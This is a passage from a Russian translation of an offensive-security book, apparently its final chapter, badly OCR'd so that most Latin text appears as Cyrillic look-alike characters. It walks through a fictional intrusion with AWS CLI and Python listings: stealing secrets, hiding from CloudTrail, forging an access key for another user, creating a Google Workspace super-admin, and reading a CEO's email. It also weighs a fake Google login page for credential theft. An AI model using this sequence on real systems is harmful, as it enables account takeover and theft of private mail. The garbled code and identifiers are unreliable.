сот/геаѕһіў/ргісіпд/. 

• Дополнительные сведения о пар и Е1а*Мар с иллюстрациями: ћїрѕ;// 
ааїа-Ўаігігаіпіпа/Б1одѕ/арасһе-ѕрагк-тар-уѕ-Наітар/. 


ФИНАЛЬНАЯ СЦЕНА 


Можно подвести итог нашим достижениям. Нам удалось 

получить исчерпывающие данные о политической рекла- 

ме, работающей на серверах МХК А45, вместе с данными 

о бюджете, рекламных кампаниях и настоящих органи- 
зациях, стоящих за всем этим. Кроме того, мы загрузили 
данные профилей сотен миллионов человек, собранные СР, 
причем каждый профиль выглядит как личный дневник, который 
можно использовать для разоблачения, шантажа или подчинения 
даже очень влиятельных людей. Что еще мы можем хотеть? 

Что ж, в этом списке наград не хватает одной вещи: электронной 
почты компании. Взлом электронной почты - такая классика, что я не 
мог закончить эту книгу, не упомянув об этом. 

Когда мы получаем учетные данные администратора домена 
в Мтдомз Асйуе Рігесіогу, за ними естественным образом следует 
неограниченный доступ к электронной почте. В среде Міпаомѕ инф- 
раструктура и корпоративный каталог связаны друг с другом. 

С АМ все иначе. Она никогда не собиралась завоевывать рынок 
корпоративных ИТ-инфраструктур. Это место уже переполнено реше- 
ниями наподобие Асііуе ГРігесїогу и Соое МогКкѕрасе (ранее С Ѕиіќе). 

Большинство технологических компаний, которые полагаются ис- 
ключительно на АМ№Ѕ или Соое1е СІоџа РІаїѓогт (ССР) для создания 
и размещения своих бизнес-продуктов, за поддержкой корпоратив- 
ной инфраструктуры обратятся к Соое1е Могкѕрасе. Вы можете сколь- 
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ко угодно ненавидеть Соое, но Ста! по-прежнему остается самой 
универсальной почтовой платформой. (Точнее, инструментом для 
управления электронной почтой. Возможно, ущерб конфиденциаль- 
ности того не стоит, но это другой разговор.) 

Часто это приводит к созданию двух отдельных ИТ-команд: одна 
отвечает за инфраструктуру, поставляющую основной продукт, а дру- 
гая занимается корпоративной стороной ИТ (электронная почта, 
принтеры, рабочие станции, служба поддержки ит. д.). 

Быстрый просмотр записей О№ Маі Ехсһапғе (МХ) показывает, 
что СР действительно использует корпоративную почту Стаі и, сле- 
довательно, возможно, иные инструменты в боое МогКкѕрасе, такие 
как Онуе, Сопѓасіѕ, Сһаї и другие (листинг 13.1). 


Листинг 13.1. Поиск записей МХ, подтверждающих, что СР 
действительно использует Соод1е Иогкѕрасе 


гооЁ@Роіпї1:~/# дід +5һогЕ дгеёѕсһро1і+ісо.сот МХ 
10 аѕртх.1.доод1е.соп. 

20 а1{2.азртх.1.90091е. сот. 

30 азртх3.90091ета\11..сом. 

20 а[{1.азрмх.1.90091е. сот. 

30 аѕртх2.доод1етаі1. соп. 


Существует не так много литературы или сценариев, предназна- 
ченных для взлома Сооз]е Могкѕрасе, поэтому давайте попробуем 
обойтись своими силами. 


Взлом Соодіе М/огкѕрасе 


Мы администрируем учетную запись АМ СР и имеем неограничен- 
ный доступ ко всем ее производственным ресурсам, включая серверы, 
пользователей, учетную запись СИНиь и так далее. Сразу приходят на 
ум две стратегии перехода в среду Соое1е МогКкѕрасе: 


• найти приложение корпоративной интрасети и заменить до- 
машнюю страницу фальшивой страницей аутентификации Соо- 
Зе, которая крадет учетные данные, прежде чем перенаправить 
пользователей в настоящее приложение; 


• исследовать кодовую базу приложений, которые могут взаимо- 
действовать со средой Соор1е М/огКѕрасе, и похитить их учетные 
данные, чтобы закрепиться на первом этапе взлома. 


Первый вариант является гарантированным победителем, если мы 
хорошо имитируем страницу аутентификации Соо?1е. Он также го- 
раздо более рискованный, поскольку предполагает взаимодействие 
с пользователем. С другой стороны, мы уже забрали то, за чем при- 
шли, так что небеса могут рухнуть, нам все равно. Это просто бонус. 

Второй вариант, с другой стороны, более незаметен, но предпола- 
гает, что ИТ-отдел имеет общие связи с остальной инфраструктурой, 
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в которую мы проникли, такие как функция Гатђаа, роль ТАМ, корзи- 
на 53, пользователь... по сути, иголка в стоге сена... или нет? 

Если вдуматься, на самом деле существует нечто, что с высокой 
вероятностью будет использоваться как ИТ-отделом, так и командой 
инфраструктуры, - это учетная запись СіїНир. Вряд ли они зарегист- 
рировали две учетные записи только для того, чтобы угодить двум 
техническим командам, не так ли? 

Давайте загрузим токен СієНир, который мы получили от ЈепКіпѕ, 
и поищем ссылки на Соое МогКкѕрасе, Стаі, Соое Биуе итак далее. 
Мы пишем краткий скрипт Руоп для загрузки имен репозиториев: 


# Ц5Е героѕ.ру 
Тгом 91ЕВиуЬ ітрогЕ СіћиБ 
9 = Сіћир("8е24ҒҒссдееййееб7ЗҒҒадсе5433#Ғсее7асе561") 
Ғог геро іп 9.деі иѕег().деё героѕ(): 
ргіпі(геро.пате, геро.с1опе џг1) 


гооЁ@Роіпї1:~/# руЕһоп3 115 _героѕ.ру > 11$%_геро$_др. хе 
гооєё@Роіпё1:~/# едгер -1 “4+[-_]|9аррѕ | 9зи\е | изег$?” 115 _героѕ_9р.ЁхЕ 


1Ё-ѕегуісе ВЕЕрь : / /аіһир. сот/дгеЁѕсһр/і&-ѕегуісе. 914 

Ө 1+-дѕџіёе-аррѕ һ+рѕ: / /9ієһиЬ. сот/дгеёѕсһр/і+-9ѕ0иіе-аррѕ.9іЁ 
иѕегѕ-ѕупс ВЕЕрь : / /аіһир. сот/дгеЁѕсһр/иѕегѕ-ѕупс 
- - Сокращено- - 


Явный признак перекрестного опыления ®. Мы клонируем ис- 
ходный код ії-9ѕџіїе-аррѕ и... знаете, что это?! Список приложений 
и служб, используемых для автоматизации многих действий адми- 
нистратора Соое1е УГогКзрасе, таких как инициализация пользовате- 
лей, назначение организационных единиц (00), закрытие учетных 
записей ит. д.: 


гооє@Роіпё1:~/# 15 -1ћ 14-95 е-арр$ 


{офа1 98М 

Чгихгихгих 1 гооЁ гооЁ 7.9М ргоуіѕіоппег 
Фгихгихгих 1 гооф гооф 13.4М сгоп-Фа$К$ 
Фгихгихгих 1 гооф гоо 6.3М а5$19п-оц 

- - Сокращено- - 


Это именно то, что нам нужно, чтобы получить контроль над Соо- 
Ле Могкзрасе! Конечно, этот секретный репозиторий не виден обыч- 
ным пользователям, но мы ведь можем имитировать ЈепКіпѕ. 

Мы начинаем мечтать о том, чтобы получить электронные письма 
генерального директора и разоблачить этот мошеннический бизнес, 
но быстро понимаем, что в этом репозитории нет ни одного пароля 
в открытом виде. 

Вто время как АҮ/Ѕ использует ключи доступа для аутентификации 
пользователей и ролей, Соое выбрал протокол ОАи{12, который тре- 
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бует явного взаимодействия с пользователем. По сути, веб-браузер 
открывается, аутентифицирует пользователя и создает код провер- 
ки, который необходимо вставить обратно в командную строку, что- 
бы сгенерировать временный закрытый ключ для вызова АРІ Соо]е 
М/огкзрасе. 

Компьютеры не могут реализовать этот цикл аутентификации, по- 
этому Соое также предоставляет сервисные аккаунты, которые мо- 
гут проходить аутентификацию с использованием закрытых ключей. 
Тем не менее при просмотре исходного кода мы не находим ни ма- 
лейшего намека на закрытые ключи: 


гоо{@Ро1пЕ1 :-/1{-95ие-арр$/# дгер -Ві “ВЕСТА РАТУАТЕ КЕУ” * 
гоо{@Ро\пЕ1 :-/14-95ие-арр$/# 


Важный нюанс заключается в том, что сервисные ак- 
каунты могут быть определены только в Соов1е СІоиа Ра югт (ССР). 
Таким образом, чтобы правильно использовать Соое МогКкѕрасе, необ- 
ходимо также подписаться на ССР. Конечно, это нигде не упоминается 
в документах, поэтому вы просто волшебным образом попадаете на 
платформу ССР из окна Соое ИгК$расе. 


Копаясь в коде і-950іЁе-аррѕ, чтобы понять, как приложение по- 
лучает свои привилегии Сбоое Могкѕрасе, мы натыкаемся на строки, 
показанные в листинге 13.2. 


Листинг 13.2. Фрагмент кода, который загружает токен службы 
из АИ/5 Ѕесгеїѕ Мападег 


- -Сокращено- - 

де{бесге* (ЗЕВУТСЕ_ТОКЕМ); 

- -Сокращено- - 

руБЛАс зас уоіа дефбесгее(${гАпд фоКеп) { 
Ѕігіпд зесге{Маме = ЁоКеп; 
54г4пд епдроіпі = "ѕесгеЁѕтападег .еџ-меѕЁ-1. атагопамѕ. сот"; 
ЅЕгіпд гедіоп = "еџ-меѕё-1"; 


АизСЛепЕВи ег .Епаро\пЕСопАдига оп сопҒід = пем Ам5С1\епЕВиі1дег. 
ЕпдроіпЁСопҒідигаіоп(епароіпі, гедіоп); 
- -Сокращено- - 


Теперь все встает на свои места. Секрет не запрограммирован 
в коде приложения, а извлекается динамически через Ѕесгеіѕ Мап- 
азег, сервис АМГ$ для централизации и хранения секретов. У нас нет 
имени секрета, но, к счастью, у нас есть полные права администрато- 
ра, поэтому мы можем легко найти его: 


гооє@Роіпі1:~/# амѕ ѕесгеЁѕтападег 11.5%-5есгее$ \ 
--гедіоп еџ-меѕ-1 \ 
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--рго Де гипдеск 


"Маме": "АпЁ/1пѕЁапсе-арі/арі -Ёокеп", 
"Мате": "іпҒ/гипаеск/туѕа1 /&еѕї_иѕег", 
"Мате": "іпҒ/гипаеск/с1еап1од/арікеу", 
"Мате": "іпғ/орепурп/\урп-етр1оуееѕ", 

- - Сокращено- - 


К сожалению, никакие поисковые запросы не выявляют ничего, 
хотя бы отдаленно связанного с Соое У/огКзрасе. Мы вручную прове- 
ряем каждую запись на всякий случай, но постепенно осознаем суро- 
вую реальность: ИТ-отдел, должно быть, использует другую учетную 
запись АМ. Это единственное разумное объяснение. 

Однако не нужно паниковать. Переход на учетную запись АМ/5 для 
ИТ-подразделения не потребует того трюка, который мы проделали 
при переходе с МХК А45 на СР. 

Эти две компании являются разными (хотя и взаимосвязанными) 
юридическими лицами. У них есть совершенно отдельные учетные 
записи АМ5. Однако ИТ-отдел является частью СР точно так же, как 
и обычная техническая команда. В конечном итоге все счета оплачи- 
вает одна компания. 

Наиболее вероятная конфигурация заключается в том, что в СР 
создали корпоративный аккаунт АМ/5, который может содержать не- 
сколько учетных записей АМ: для технической группы, для ИТ-от- 
дела, для тестирования и так далее. В такой конфигурации один из 
аккаунтов А\М/$ повышается до статуса таз*ег (главный аккаунт). Его 
можно использовать для присоединения новых учетных записей 
ккорпоративному аккаунту и применения глобальных политик, огра- 
ничивающих доступный набор услуг в каждой учетной записи. 

Главный аккаунт обычно лишен какой-либо инфраструктуры 
и должен - в идеальном мире - делегировать задачи управления, 
такие как агрегирование логов, отчеты о выставлении счетов и т. д., 
другим учетным записям. Мы можем легко подтвердить нашу гипо- 
тезу, вызвав АРІ АМ 115 -ассоџпіѕ, используя нашу всемогущую роль 
гипдеск (листинг 13.3). 


Листинг 13.3. Список учетных записей АМ/5 


гоо@Ро1п{1:-/# амѕ огдап\хаоп$ 115Ё-ассоџипёѕ 
"АссошпЁѕ": [ 
14: 983457354409, Маме: СР ІпЁга, Емаі1: іпЁга-айтіп@дге... 
19: 354899546107, Мате: СР Гар, Етаі1: ор-1аБ@дгеєѕсһро11... 
Ө 14: 345673068670, Мате: СР ІТ, Ема: айтіп-і@одгеЁѕсһро14і.. 
- - Сокращено- - 


Неплохо. Мы видим учетную запись администратора, как и ожида- 
лось ®. 

При создании учетной записи АМҮ автоматически создает роль по 
умолчанию с именем Огдап1та{ТопАссоип{АссезВо\е. Политика дове- 
рия по умолчанию для этой роли разрешает реализацию любого поль- 
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зователя аккаунта, способного выполнять вызов АРІ-интерфейса аѕ- 
ѕипе-го1е службы маркеров безопасности (Зесигу Токеп Ѕегуісе, 5Т5). 
Давайте посмотрим, сможем ли мы получить его учетные данные: 


гооє@Роіп1:~/# амѕ 55 аз5име-го1е \ 

--го1е-ѕеѕѕіоп-паме таіпёепапсе \ 

--го1е-агп агп:анѕ : ам: :345673068670: го1е/ОгдапігаіопАссоипёАссеѕѕВо1е \ 
--ргоЁіЛе гипдеск 


Ап еггог оссиггед (Ассеѕѕрепіей) мһеп са\11пд Ве АѕѕитеВо1е орега оп... 


Черт возьми, мы были так близко! Если даже Випдеск не имеет 
права выдавать себя за пользователя с ролью ОгдапіғаііопАссоипі- 
Ассеѕ5Во1е, это означает, что или данная роль была удалена, или ее 
политика доверия была ограничена несколькими избранными поль- 
зователями. Если бы только существовала центральная система, кото- 
рая регистрирует каждый запрос АРІ в АМ, чтобы мы могли искать 
там этих привилегированных пользователей... Ну привет, СІоџаТгаі! 


Злоупотребление С1оиТгаЙ 


Каждый раз, когда пользователь принимает роль, этот запрос регист- 
рируется в СІоџаТтгаії и, в случае СР, передается в СІоџаМаѓсћ и $53. 
Мы можем использовать эту постоянно работающую систему, чтобы 
выделить тех пользователей и роли, которым разрешено переходить 
к ИТ-аккаунту. АРІ Соч@Тга! предоставляет совсем немного возмож- 
ностей фильтрации, поэтому вместо него мы воспользуемся мощной 
командой СІоџамМаѓсћ Е ег-109-е\уеп{<. 

Во-первых, получаем имя группы логов, которая объединяет логи 
СочаТгай: 


гооє@Роіп1:~/# аиз 109$ йеѕсгібе-109-д9гоџирѕ \ 
- -гедіоп=еџ-меѕЁ-1 \ 

--ргоЁіЛе фе$& 

- -Сокращено- - 

1о9бгоирМате: С1оџТгаіл /беРац1о9бгоир 

- -Сокращено- - 


Затем, как показано в листинге 13.4, нужно просто найти вхожде- 
ния идентификатора ИТ-аккаунта 345673068670, который мы полу- 
чили из листинга 13.5. 


Листинг 13.4. Событие СоиаТгай, показывающее, что е\15 .ѕку\ег 
реализует роль внутри ИТ-аккаунта 


гооЁ@Роіпї1:~/# амѕ 1095 Ғ.Л+ег-109-еуепёѕ \ 

- -Лод-дгоир-паме “С1оџйТгаіл /деҒаи1 +. одбгоир” \ 
--РАЛ+ег-раі+егп “345673068670” \ 

--пах-іёетѕ 10 \ 
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--ргоР Де гипдеск \ 
--гедіоп еџ-меѕё-1 \ 
| ја “.еуепЕѕ[].теѕѕаде” \ 


| зе4 ‘$/\\//9’ 


"иѕегІйепёі+у": { 
"Еуре": "ТАМУзег", 
"агп": "агп:амз:1ат:: 983457354409:05ег/е115.5Ку1ег", 
"ассоипІа": "983457354409", 
"ассеѕѕКеуІй": "АКІА447АК6М5467МС6и" , 
© "иѕегМаме": "е115.5Ку1ег" 
}, 
"гедџеѕ&Рагамеїегѕ": { 
"го1еАгп": "агп:амѕ:1ат: : 345673068670: го1е/ 
ОгдапігаїіопАссоџпЁАссеѕ5Во1е", 
"геѕропѕеЕ1етепёѕ": {"сгейепёіа15": { 
- - Сокращено- - 


Похоже, пользователь е115.5Кку1ег ® использовал роль Огдапіға- 
ёіопАссоипЕАссеѕ5Ао1е несколько часов назад. Пришло время украсить 
эту учетную запись дополнительным ключом доступа, который мы 
можем использовать, чтобы взять на себя чужую роль. Конечно, для 
этого маневра мы должны временно ослепить СочаТгай, но я опущу 
код, так как вы уже знакомы с этой техникой из главы 11: 


гооє@Роіп1:~/# ам іам сгеа%е-ассез$-Кеу \ 
--изег-паме е1іѕ.ѕКу1ег \ 
--рго Ре гипдеск 


АссеѕѕКеу: { 

УзегМате: е115.5Ку1ег, 

АссеѕѕКеуІй: АКІА447АКбИЅВрІХТТрЅ, 

ЅесгеЁАссеѕ5Кеу: 564/ /еуАрое96ркуӨрЕддАмгое1ак78едһк 


Используя эти новые учетные данные, мы запрашиваем временные 
ключи АМ, принадлежащие роли ОгдапігаіопАссоџпЁАссеѕ5Во1е: 


гоої@Роіпё1:~/# амз 55 аѕѕите-го1е \ 

--го1е-ѕеѕѕіоп-патме таіпёепапсе \ 

--го1е-агп агп:анѕ : іам: : 345673068670: го1е/ОгдапіғаіопАссоџпёАссеѕѕВо1е \ 
--ргоР Де е11ѕ \ 

--игаёіоп-ѕесопӣѕ 43 200 


АссеѕѕКеуІй: АЅТАЦбЕЦОМІЈТАРАРЄВО, 
ЅесгеЁАссеѕ5Кеу: хпЗ7гітЈЕАррјріс22Р19ҺОҺ0Т02Р065Х2хенНЬк, 
ЅеѕѕіопТокеп: Емоб2ХІУҮХа2ЕСма. . . 


Это было не так уж и сложно. Теперь давайте используем эти учет- 
ные данные для доступа, чтобы найти АҮ Ѕесгеїѕ Мапавег в этой но- 
вой учетной записи: 
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гооє@Роіпі1:~/# амѕ ѕесгеЁѕтападег 115#-ѕесгеіѕ \ 
--гедіоп еџ-меѕ-1 \ 
--ргоЁіЛе і-го1е 


ААМ: агп:амѕ :ѕесгеѕтападег:еџ-меѕЁ-1: 345673068670: 5есгеї:1/ 
дѕиіёе-аррѕ /иѕег -ргоуіѕіоппіпо-40ҮХРА 


Мате: 1&/9ѕиіёе-аррѕ/иѕег-ргоуіѕіопіпд, 
- -Сокращено- - 


Замечательно. Мы извлекаем содержимое секрета и декодируем 
его, чтобы получить файл ]ЗОМ, используемый для аутентификации 
учетных записей службы Соое]е (листинг 13.5). 


Листинг 13.5. Получение ключа учетной записи сервиса ССР 


гоо@Роіпё1:~/# аи$ ѕесгеЁѕтападег деЁ-ѕесгеЁ-уа1џе \ 

- -сесге{-14 *агп:амѕ:ѕесгеЁѕмападег:еџ-меѕ-1:345673068670:ѕесгеё:1+/ \ 
95иіже-аррѕ/иѕег-ргоуіѕіоппіпо-40ҮХРА? \ 

- -гедіоп=еи-меѕ-1 \ 

--ргоЁ Ле 1Е-го1е \ 

| ја -г .Ѕесгеёѕгіпд | Базеб4 -а 


{ 


"уре": "ѕегуісе ассоџпі", 
"ргојесё 19": "др-9ѕиіе-262115", 
"ргімаёе Кеу 14": "05а8519168856773743е47сс{8828а522а00Рс8{", 
"ргімаёе_Кеу": "----- ВЕСІМ РВІМАТЕ КЕҮ- - - - - о 
"слеп етаі1": "иѕегргоуіѕіоппіпоф@ор -9ѕ0і&е-262115.4ат. дѕегуісеассоипі. сот", 
"с1лепі 14": "100598087991069411291", 
- - Сокращено- - 


Учетная запись сервиса называется изегргом1$1опп1п9@9р-дзи1е - 
262115.1ат.дзегу1сеассоип*.сом и привязана к проекту Соое СІоџа 
др-9$и14е-262115. Не Соое1е МогКзрасе, заметьте, а бСоозе СІоџа. По- 
скольку Соое М’огКзрасе не обрабатывает токены служб, любой, кто 
хочет автоматизировать администрирование своего Соое МогК- 
зрасе, должен создать токен службы в Соое]е С]очца, а затем назначить 
области действия и разрешения для этой учетной записи в Соое 
М’огкзрасе. Трудно представить более корявый подход! 

Мы уже знаем, что этот токен службы имеет необходимые разреше- 
ния для создания пользователя, поэтому давайте создадим учетную 
запись суперадминистратора в Соо?1е МогКкѕрасе. 


Создание учетной записи суперадминистратора 
Соодіе М/огкѕрасе 


Вы можете найти полный код Руіћор в файле сгеа*е_изег.ру, который 
размещен в файловом архиве книги, поэтому я просто выделю клю- 
чевые моменты. 
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Сначала нам нужно объявить область действия (ѕсоре), т. е. пере- 
чень полномочий, которыми наша учетная запись будет обладать 
в Соое1е МогКѕрасе. Так как мы будем создавать новую учетную 
запись, нам понадобится область адт\п. 4Агесфогу .изег. Для этого мы 
укажем расположение файла токена службы и электронную почту, от 
имени которых мы будем выполнять наши действия: 


ЅСОРЕЅ =[ 'Һёрѕ: / /иим. доод1еаріѕ .сот/аиёһ/адтіп.ігесёогу.иѕег'] 
ЅЕАМІСЕ АССООМТ_ЕІПЕ = 'Єокеп. јѕоп' 
ОЅЕВ_ЕМАІІ = "айтіп-іє@огеёѕсһро1і+ісо.сот" 


В модели безопасности Соое учетная запись службы не может 
напрямую воздействовать на учетные записи пользователей; снача- 
ла ей нужно выдать себя за реального пользователя, используя при- 
вилегии делегирования на уровне домена, настроенные в свойствах 
учетной записи службы. Затем действия передаются с привилегиями 
этого пользователя, поэтому нам лучше найти суперадминистратора, 
от имени которого мы будем действовать. 

Без проблем. Мы пытаемся ввести адрес электронной почты владель- 
ца ИТ-аккаунта АМ/5 СР, который мы нашли в листинге 13.3 при про- 
смотре существующих аккаунтов АМ: айтіп-і@огеёѕсһро11&ісо.сот. 

Затем идет стандартный код Руіћоп для создания клиента Соое 
М’огкзрасе, изображающего администратора ИТ-группы: 


сгедеп{1а15 = (ѕегуісе ассоџпі.Сгейепёіа15. 
Тгом_егу\се_ассоип_РАДе (ЗЕВУТСЕ_АССОУМТ_ЕТЕЕ, ѕсореѕ=5С0РЕЅ)) 


де\еда{ед_сгедеп1а1$ = сгейепё\а15 .иАЕН_зи6 ес (УЗЕВ_ЕМАТЕ) 
ѕегуісе = іѕсоуегу.БиіЛ1а('айтіп', 'ЧАгесфогу у1', сгейепёіа15=йе1едаіей сгейепїіа15) 


Мы создаем словарь с нужными нам атрибутами пользователя 
(имя, пароль и т. д.), а затем выполняем запрос: 


изег = {"пате": {"Ғаті1уМате": "Вигёоп", "94\епМаме": "Напіе1", }, 
"раѕѕмогӣ": "Ѕёгопд45Раѕѕмогӣ*", "ргітагуЕтаі1": "Һапіе1Ле@огеёѕсһро11+ісо. сот", 
"огдупіРаєћ": "/" } 


геѕи1Є = ѕегуісе.иѕегѕ() .іпѕегі(Боду=иѕег).ехесиёе() 


Последний шаг - сделать нашего пользователя суперадминистра- 
тором всей организации: 


ѕегуісе.иѕег5() .такеАйтіп(иѕегКеу="һапіе1Ле@дгеѕсһро1іісо. сот", 
Бойу={ "ѕёаёиѕ": Тгџе}).ехесиёе() 


Теперь просто запускаем файл: 
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гооЁ@Роіпї1:~/# руЕһоп сгеае_изег.ру 


Сообщения об ошибке нет. Это действительно сработало? Мы от- 
крываем браузер и переходим в консоль администратора Соозе 
ҮогКкѕрасе, И#р5//айтт.доод(е.соту, как показано на рис. 13.1. 


© бооде Ассоипіѕ 


<= се: ) доодіе.сот 


Сооде 


М/есоте о уоиг пем/ ассочпї 


Рис. 13.1.Доступ к нашей недавно созданной учетной записи Соодіе Иогкѕрасе 


Получилось, да еще как! Мы только что получили доступ админист- 
ратора к корпоративному каталогу СР. Теперь для нас нет ничего не- 
возможного: стай, соо е "гіхе, что угодно. 


Взгляд украдкой 


Чтобы оставаться втени, мы не будем использовать функции экспорта 
и утилиты переноса данных боое МогКкѕрасе. бСоое автоматически 
оповещает других администраторов, когда кто-либо запускает эти 
задачи. Мы будем взаимодействовать с Сооғ1е М’огКзрасе исключи- 
тельно так, как делали это до сих пор: через вызовы АРІ. Нам просто 
нужно обновить область действия учетной записи службы настройки 
пользователей, которую мы стащили из 5есгез Мапарег, чтобы вклю- 
чить доступ к Ста! и боое "гіхе. 

В консоли администратора Соое1е МогКкѕрасе мы переходим на па- 
нель Ѕесигіїу (Безопасность) => Айуапсеа Ѕеіііпеѕ (Дополнительные 
настройки) = Мапазе АРІ Ассеѕѕ (Управление доступом к АРІ ивво- 
дим следующие две области действия в поле Опе ог Моге АРІ $согез 
(Одна или несколько областей АРІ), как показано на рис. 13.2: 


• һіірѕ/Лууу.д00діеаріѕ.сот/аиіҺ/агіүе; 
• һіірѕ;/Лууу.д00д91еаріѕ.сот/аиѓһ/дта!!.геааопіу. 


Аиќћогігеа АР! сііепѕ Тһе їоПоуіпо АРІ сйеп{ аотаіпѕ аге гедіѕіегеа мп Соодіе апа ашпопгеч {0 ассеѕѕ да{а їог уоиг изегз. 
Сіепі Мате. Опе ог Моге АР! Зсорез 

] Ацћогіге 
Ехатріе: мму.ехатріе.сот Ехатріе: һїр:/лумму.доодіе.сот/саіепааг/їеедѕ/ (сотта-деіїтіеад) 


Уем апа тападе {ће ргоуіѕіопіпд ої иѕегѕ оп уоиг аотаіп Һіїрѕ://уууү.доодіеаріѕ.сот/аиіћ/аатіп.аїге 
100598005991069411799 ћќрѕ:/^умм.доодіеаріѕ.сот/аиќҺ/ гіме 
Һёрѕ://Амм.доодіеаріѕ.сот/аиёһ/дтаіі.геайопіу 


Рис. 13.2. Панель администратора боод!е Иогкрасе для обновления областей 
действия АРІ 
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В поле СНеп Мате (Имя клиента) введем имя учетной записи 
службы, иѕегргоуіѕіоппіпо@ор-оѕиіёе- 262115 .іат. дѕегуісеассошпі. 
сот, которое преобразуется в уникальный идентификатор. 

В отличие от обычных интуитивно понятных панелей, которыми 
славится Сооз]е, эта панель администратора особенно ужасна. Вы не 
можете просто добавить области, потому что они перезапишут ста- 
рые. Вам необходимо ввести все области, назначенные учетной запи- 
си службы (старые и новые)! 

Мы создаем новый скрипт дпаі1.ру Руоп с тем же стандартным 
кодом, который ранее использовался для создания пользователя, за 
исключением нескольких изменений: 


ИЗЕВ_ЕМАТЕ = 'а\ехапфга. ѕёух@дгеїѕсһро1і&ісо.сот' 
ѕегуісе = іѕсоуегу.Биі14(® 'дтаі1', 'у1', сгейепёіа15=йе1едаіей сгейепііа15) 
Ө геѕи1+ѕ = ѕегуісе.иѕегѕ().теѕѕадеѕ() .1151( 
иѕегІа=0ЅЕА ЕМАІГ, 
ЛаБе1145 = ['ІМВОХ']).ехесиѓе() 


меѕѕадеѕ = геѕи15.де&('теѕѕадеѕ', []) 


Мы обновляем область действия, включив в нее Стаі! ®, а затем 
вызываем метод АРІ иѕегѕ().теѕѕадеѕ() Ө для получения электрон- 
ных писем генерального директора, чье имя мы с легкостью отыскали 
в ИпКеаїп. 

Затем нужно просто просмотреть сообщения, извлекая тему, от- 
правителя, получателя и текст сообщения. Полный код скрипта вы 
найдете в файловом архиве книги. Мы запускаем скрипт РуШоп и не 
спеша просматриваем электронные письма: 


гоої@Роіпё1:~/# руЁһоп дмаі1.ру 

а\ехапдга. ѕёух@дгеёѕсһро1іісо. сом; 
уа1егу.аёёепБоџгоцдћ@дгеёѕсһро11+ісо. сот; 
Ѕип, 15 рес 2020; 

Подписан контракт с партией - 2 млн баксов! 


Сегодня мы подписали контракт! А завтра можем начинать давить на 
колеблющихся избирателей! 


а1ехапӣга. ѕ&ух@дгеіѕсһро14і&ісо. соп; 
адат. ѕраггом@дгеЁѕсһро1і+ісо. сот; 

Ѕип, 12 рес 2020; 

Надо что-то делать с имиджем кандидата 


Ребята, мы можем быстро слепить инфоповод? Закажите сценаристам девочек, 
шампанского и начинайте работать! У нас уже есть несколько сюжетов, пора их 
запускать!!! 


Стеїѕсһ Роібісо во всей красе, дамы и господа! Кажется, мы нырну- 
ли в грязь. 
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Заключительное слово 


Ура, мы дошли до конца! Это было напряженное путешествие, напол- 
ненное множеством эзотерических технологий и новых парадигм. 
Распространение облачных вычислений не зря считают одним из са- 
мых революционных событий последнего десятилетия. И хотя мно- 
гие технологические компании и стартапы уже полностью освоили 
облачные технологии, я чувствую, что сообщество по безопасности 
все еще отстает. 

Каждый пост, который я читал о расширении полномочий, связи С2 
ит. д., посвящен исключительно АсНуе Рігесѓогу - как будто это един- 
ственная возможная конфигурация и как будто самые ценные данные 
обязательно хранятся на общем ресурсе Міпаоуѕ или сервере 501. Это, 
конечно, не относится к банкам и авиакомпаниям (они, как тараканы, 
не меняются веками). На самом деле все больше и больше техноло- 
гических компаний отказываются от инфраструктур на базе Міпӣомгѕ. 

Может быть, это предубеждение, вызванное консалтинговыми ком- 
паниями, работающими только со старыми фирмами, которые все еще 
по уши в Асііуе Опесгогу. Может быть, это количество Міпаомѕ СУЕ 
(Соттоп УџпегаБіібеѕ апа Ехроѕигеѕ, распространенные уязвимости 
и риски), наводнивших рынок. Вероятно, сочетание того и другого. 

В любом случае, я надеюсь, что многочисленные примеры в этой 
книге помогли донести до вашего сознания главную мысль: безопас- 
ность заключается в тщательном изучении технологии, постановке 
вопросов и разборке существующих решений на части, пока не при- 
дет понимание. Чем глубже вы копаете, тем легче потом работать. 

В этой книге вы встретили много специально разработанного кода, 
предназначенного для обхода службы обнаружения или назойливых 
сетевых ограничений. Скачайте примеры кода, поэкспериментируй- 
те с ними, попробуйте в бесплатной учетной записи АМГЗ и найдите 
им новое применение. Это единственный проверенный путь к успеху. 

Удачного хакинга! 


Дополнительные ресурсы 


• Интересная статья Мэтью Туссейна о взломе Соое У/огКзрасе (ра- 
нее С Ѕиіїе) на ћіїрѕ /Лумууу.БІаскћі1ѕіпјоѕес.сот/. 


• Руководство Соое по использованию ОАи{12 для доступа к своим 
АРІ: һїр//Љіу/2ВА2ҮЕх. 
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